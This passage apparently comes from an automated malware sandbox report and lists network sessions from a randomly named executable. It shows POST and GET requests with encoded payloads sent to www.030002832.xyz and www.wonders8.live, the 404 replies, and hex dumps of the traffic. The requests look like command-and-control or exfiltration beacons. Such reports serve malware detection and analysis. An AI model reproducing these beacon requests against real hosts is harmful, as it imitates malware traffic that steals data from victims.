                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 57 47 49 43 4d 64 4a 72 65 4d 64 6e 75 6b 74 41 66 7a 6e 65 7a 70 2b 43 2b 46 42 33 46 4d 4b 6a 44 7a 65 54 59 49 6c 35 58 74 69 36 35 4d 35 6f 6e 56 52 5a 4a 52 38 35 6d 73 33 62 35 59 52 42 37 41 63 47 6f 59 5a 6f 2f 67 68 70 57 6d 58 2f 6b 52 4a 34 38 64 69 4e 69 63 79 66 5a 33 65 56 39 62 68 66 54 62 52 35 6f 7a 46 35 62 79 71 5a 74 76 57 31 43 78 79 41 45 55 6f 72 48 51 5a 75 33 35 66 69 54 64 62 62 51 66 42 62 4c 4f 63 6d 61 67 64 64 2b 75 73 59 48 62 57 74 32 6d 74 4b 4d 31 70 7a 56 71 41 68 51 41 63 47 47 2f 73 44 6a 34 62 49 76 36 77 70 45 36 38 34 54 73 7a 33 67 44 38 6f 5a 55 50 30 49 6b 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FMKjDzeTYIl5Xti65M5onVRZJR85ms3b5YRB7AcGoYZo/ghpWmX/kRJ48diNicyfZ3eV9bhfTbR5ozF5byqZtvW1CxyAEUorHQZu35fiTdbbQfBbLOcmagdd+usYHbWt2mtKM1pzVqAhQAcGG/sDj4bIv6wpE684Tsz3gD8oZUP0Ik=
                                                                                                              Nov 5, 2024 15:34:38.588337898 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:38 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:38.588388920 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.11.2049752161.97.142.144804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:41.117851019 CET7895OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 57 47 49 43 4d 64 4a 72 65 4d 64 6e 75 6b 74 41 66 7a 6e 65 7a 70 2b 43 2b 46 42 33 46 45 4b 6a 32 76 65 53 37 67 6c 36 58 74 69 6d 70 4d 30 6f 6e 56 32 5a 4a 35 34 35 6d 78 41 62 37 51 52 41 64 55 63 48 61 77 5a 2f 76 67 68 72 57 6d 4b 38 55 52 63 34 34 42 6d 4e 69 73 79 66 5a 33 65 56 2f 44 68 62 48 33 52 30 49 7a 61 2b 62 79 32 64 74 75 4a 31 43 34 48 41 45 51 34 71 32 77 5a 75 55 42 66 6e 67 31 62 58 51 66 66 63 4c 4f 55 6d 61 63 47 64 2b 61 67 59 47 76 77 74 31 47 74 49 6f 6f 78 67 42 2b 4b 69 41 4d 6e 43 33 32 61 4e 6c 30 37 57 64 4b 73 74 43 69 73 77 48 30 51 70 51 48 58 7a 4b 63 6c 33 49 4e 7a 76 49 66 44 7a 57 70 6c 65 6a 55 63 33 53 75 7a 36 30 63 4c 4a 4f 4f 44 76 69 4b 55 66 75 62 76 7a 58 6b 55 6e 59 50 31 4d 42 6b 31 4f 57 71 50 72 32 6e 42 47 64 41 63 54 42 33 6b 52 47 55 71 51 68 54 64 4c 75 78 4a 45 66 65 66 64 53 59 72 79 69 50 31 6a 44 67 72 31 53 49 70 49 62 33 2f 42 42 65 72 34 6f 49 68 57 67 79 36 44 69 66 59 4e 33 67 69 68 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FEKj2veS7gl6XtimpM0onV2ZJ545mxAb7QRAdUcHawZ/vghrWmK8URc44BmNisyfZ3eV/DhbH3R0Iza+by2dtuJ1C4HAEQ4q2wZuUBfng1bXQffcLOUmacGd+agYGvwt1GtIooxgB+KiAMnC32aNl07WdKstCiswH0QpQHXzKcl3INzvIfDzWplejUc3Suz60cLJOODviKUfubvzXkUnYP1MBk1OWqPr2nBGdAcTB3kRGUqQhTdLuxJEfefdSYryiP1jDgr1SIpIb3/BBer4oIhWgy6DifYN3gih2MTOMQnJDe0Xf3VMdvJ45olmUvWfOIxSFOerPTlB4+WO0YMr+YUXTaP9rqGtliVtWduNUhZGDuZyo1Bc8zKDaSizuY/XhSz90o5x1z5Do+Ba7OVwKF6A+OwKJ8b3unvGVbuyoJP11sFMBc+TtnTjwJKjQj5tOvQxh1EaP+j5uiBa+jDz6COvNQ1IYNw+IAPdPWO9hwxV+1fjtBxUUvX/UcxivqTyHAnHV2Nb48gMjNklIsxnvXLE8yq5CjZQrrhYE5uvwva4nH9EnnfpzVN7kxu95wceyn22YEGrwDIyOxeuLmLfR2d20i6vcmOg0Nu/ro9SvJ3KfzTCZOXKrUhC1O28D0Rxq/9lgtTTNnd3iG8X/sYayVNXpxz8C69dhNlHjW0LRmIt//zMvUG4bDAbLVXQF+liapjHB/HQcZ6fhqy8hlkBOHTFrcQC9up8W9P9/LZwgtb/IlqH7CkX+3U8QZ2gqwL5k2lFyAMBRqCuRCf2LQX8JR6Do1WAO6LXkQkMGB6FjVwi1GTSBV02Te3eguyAhu1I4ium9nNlc5aVOnfrTfMb+EYH4eAGE5PxYZt5teFRPaasWSk6hkuAaKbmlmTYj4xyyo2VH9GCi/evrOMcaVsrX8IEC23UN878OB6tziGoa9xj1piXftBVz0ga5jgaM1K2uVOvhk [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:41.309434891 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:41 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:41.309484959 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.11.2049753161.97.142.144804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:43.830497980 CET457OUTGET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.030002832.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:34:44.022392035 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:43 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 2966
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: "66cce1df-b96"
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:44.022435904 CET1289INData Raw: 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61
                                                                                                              Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
                                                                                                              Nov 5, 2024 15:34:44.022479057 CET592INData Raw: 37 20 30 2d 35 38 2e 30 30 32 2d 36 30 2e 31 36 35 2d 31 30 32 2d 31 31 36 2e 35 33 31 2d 31 30 32 7a 4d 32 35 36 20 33 33 38 63 2d 32 35 2e 33 36 35 20 30 2d 34 36 20 32 30 2e 36 33 35 2d 34 36 20 34 36 20 30 20 32 35 2e 33 36 34 20 32 30 2e 36
                                                                                                              Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.11.2049754119.18.54.27804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:50.393707991 CET726OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 57 2f 4e 4d 38 69 4a 42 38 59 41 75 55 69 36 45 56 35 70 48 30 6c 54 39 72 77 68 4b 6f 55 71 34 30 6b 2f 68 52 55 53 78 72 4e 50 50 38 6a 4a 37 6c 78 5a 6a 30 4d 70 70 39 66 70 5a 64 46 42 47 68 6e 64 76 76 2f 51 37 77 4f 79 6c 58 57 6d 76 33 72 53 44 38 66 71 66 61 41 50 61 32 73 46 4f 56 52 6b 45 76 6d 30 53 69 52 63 32 6f 6e 4a 76 6b 2f 68 76 53 6c 33 6c 53 2b 66 4b 78 48 74 35 32 37 5a 31 63 6b 45 77 31 69 39 4d 66 6e 43 54 53 47 6c 33 49 71 6c 52 32 62 58 44 4b 36 54 5a 64 69 74 77 6e 59 34 74 6b 70 72 61 61 34 4a 53 54 53 70 4c 55 77 3d 3d
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NW/NM8iJB8YAuUi6EV5pH0lT9rwhKoUq40k/hRUSxrNPP8jJ7lxZj0Mpp9fpZdFBGhndvv/Q7wOylXWmv3rSD8fqfaAPa2sFOVRkEvm0SiRc2onJvk/hvSl3lS+fKxHt527Z1ckEw1i9MfnCTSGl3IqlR2bXDK6TZditwnY4tkpraa4JSTSpLUw==
                                                                                                              Nov 5, 2024 15:34:50.887130976 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:50 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.11.2049755119.18.54.27804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:53.335347891 CET746OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 4d 63 6c 4d 39 43 31 42 73 49 41 74 4b 53 36 45 50 4a 70 44 30 6b 76 39 72 78 6c 61 6f 69 36 34 30 46 50 68 41 6c 53 78 71 4e 50 50 6b 7a 4a 2b 72 52 5a 6f 30 4d 6c 68 39 64 74 5a 64 45 6c 47 68 6c 46 76 76 4d 34 38 77 65 79 72 61 32 6d 74 7a 72 53 44 38 66 71 66 61 44 7a 30 32 73 64 4f 56 42 55 45 70 48 30 64 73 78 63 31 69 48 4a 76 7a 76 68 72 53 6c 33 62 53 36 2b 52 78 45 5a 35 32 35 42 31 63 78 6f 7a 75 79 39 4f 56 48 44 41 66 6d 51 64 51 62 74 61 33 59 48 37 50 50 44 37 56 55 38 71 36 71 4d 4a 6e 36 33 6f 65 49 77 36 52 51 6f 51 4a 30 41 30 57 64 45 4a 69 6e 46 63 49 5a 44 33 6e 49 33 7a 66 74 55 3d
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NMclM9C1BsIAtKS6EPJpD0kv9rxlaoi640FPhAlSxqNPPkzJ+rRZo0Mlh9dtZdElGhlFvvM48weyra2mtzrSD8fqfaDz02sdOVBUEpH0dsxc1iHJvzvhrSl3bS6+RxEZ525B1cxozuy9OVHDAfmQdQbta3YH7PPD7VU8q6qMJn63oeIw6RQoQJ0A0WdEJinFcIZD3nI3zftU=
                                                                                                              Nov 5, 2024 15:34:53.830602884 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:53 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.11.2049756119.18.54.27804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:56.308614016 CET1289OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
